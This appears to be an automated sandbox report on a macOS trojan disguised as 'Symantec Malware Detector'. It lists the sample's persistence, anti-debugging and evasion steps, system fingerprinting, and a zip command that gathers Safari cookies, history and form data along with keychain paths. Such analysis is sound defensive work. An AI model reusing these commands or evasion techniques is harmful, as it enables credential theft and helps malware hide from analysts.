Hooking and other Techniques for Hiding and Protection:

Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions

Show sources

Source: /bin/sh (PID: 546)

Launch agent created file created: /Library/LaunchAgents/com.apple.xpcd.plist

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)

Show sources

Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)

PTRACE system call (PT_DENY_ATTACH): PID 505 denies future traces

Explicitly terminates console (used for log message viewing) processes

Show sources

Source: /bin/sh (PID: 533)

Kills 'Console' processes: killall Console

Explicitly terminates network capturing processes

Show sources

Source: /bin/sh (PID: 534)

Kills 'Wireshark' processes: killall Wireshark

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Sysctl read request: kern.safeboot (1.66)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Sysctl read request: kern.safeboot (1.66)

Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration

Show sources

Source: /bin/sh (PID: 494)

Csrutil executable: /usr/bin/csrutil -> csrutil status

Language, Device and Operating System Detection:

Reads the system or server version plist file

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 504)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/sw_vers (PID: 552)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Queries OS software version with shell command 'sw_vers'

Show sources

Source: /usr/bin/perl5.18 (PID: 552)

sw_vers executed: /usr/bin/sw_vers -productVersion

Reads hardware related sysctl values

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Sysctl read request: hw.availcpu (6.25)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Sysctl read request: hw.ncpu (6.3)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Sysctl read request: hw.cpu_freq (6.15)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Sysctl read request: hw.availcpu (6.25)

Reads the kernel OS version value

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Sysctl read request: kern.osversion (1.65)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Sysctl read request: kern.osversion (1.65)

Reads the systems OS release and/or type

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Sysctl requested: kern.ostype (1.1)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)	Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)	Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 513)	Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 516)	Sysctl requested: kern.osrelease (1.2)

Reads the systems hostname

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 478)	Sysctl requested: kern.hostname (1.10)
Source: /sbin/route (PID: 479)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 481)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 482)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 483)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 484)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 486)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 488)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 489)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 493)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 494)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 495)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 495)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 496)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 498)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 500)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 501)	Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 506)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 509)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 511)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 514)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 517)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 519)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 521)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 523)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 525)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 527)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 529)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 530)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 531)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 532)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 537)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 539)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 543)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 544)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 545)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 546)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 547)	Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 550)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 553)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 554)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 555)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 556)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 557)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 558)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 559)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 560)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 562)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 563)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 564)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 565)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 566)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 567)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 568)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 569)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 570)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 571)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 572)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 573)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 574)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 575)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 576)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 577)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 578)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 579)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 580)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 581)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 583)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 585)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 586)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 587)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 591)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 592)	Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 593)	Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

Archives Safari's bookmarks and may steal them

Show sources

Source: /bin/sh (PID: 485)

Zips Safari's bookmarks : /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values

Archives Safari's cookies and may steal them

Show sources

Source: /bin/sh (PID: 485)

Zips Safari's cookies: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values

Archives Safari's history database and may steal it

Show sources

Source: /bin/sh (PID: 485)

Zips Safari's history DB: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values

Archives Safari's saved forms and may steal them

Show sources

Source: /bin/sh (PID: 485)

Zips Safari's saved forms: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values

May steal keychain information which contains credentials

Show sources

Source: /usr/bin/zip (PID: 487)	Keychain directory enumerated: /Users/vreni/Library/Keychains
Source: /usr/bin/zip (PID: 487)	Keychain directory enumerated: /Library/Keychains

Runtime Messages

Command:	open
Exitcode:	0
Killed:	False
Standard Output:
Standard Error:

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Classification

Signature Overview

Cryptography:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Runtime Messages

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Antivirus Detection

Initial Sample

Dropped Files

Domains

Screenshot